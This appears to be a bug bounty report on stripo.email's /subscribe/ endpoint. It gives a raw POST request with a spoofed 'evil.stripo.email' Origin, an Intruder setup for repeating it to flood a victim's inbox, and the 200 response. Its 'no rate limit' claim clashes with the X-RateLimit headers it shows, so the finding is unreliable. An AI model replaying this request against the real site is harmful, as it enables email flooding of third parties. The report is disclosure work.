I found bypass no rate limiting using Access-Control-Allow-Origin:
and look the response as 200
vulnerable
No rate limit means their is no mechanism to protect against the requests you made in a short frame of time. If the repetition doesn’t give any error after 50, 100, 1000 repetitions then their will be no rate limit set. vulnerable has registred in #297359 #774050 #922470
URL Effected
https://stripo.email/subscribe/
§
null-payloads
and run intruderRequest
POST /subscribe/ HTTP/1.1
Host: stripo.email
X-Requested-With: XMLHttpRequest
Content-Length: 126
Origin: https://evil.stripo.email
Connection: close
Referer: https://evil.stripo.email/
_token=§§&source=LANDING&subscribe-email=hostbugbounty%40gmail.com&g-recaptcha-response=
Responsive Vulnerability
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Nov 2020 04:33:08 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
X-RateLimit-Limit: 20
X-RateLimit-Remaining: 14
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: https://evil.stripo.email
Content-Length: 234
{"success":{"_token":"Zc3Jo8QdivuDDsaS8LhimIW8mVo88eRVl9FYrBi8","source":"LANDING","subscribe-email":"[email protected]","g-recaptcha-response":null},"message":"Thanks! You're subscribed, look for a confirmation email shortly."}
[CORS Bypassing Noratelimiting vulnerable] the attacker can send a request to the victim’s email using a cloud server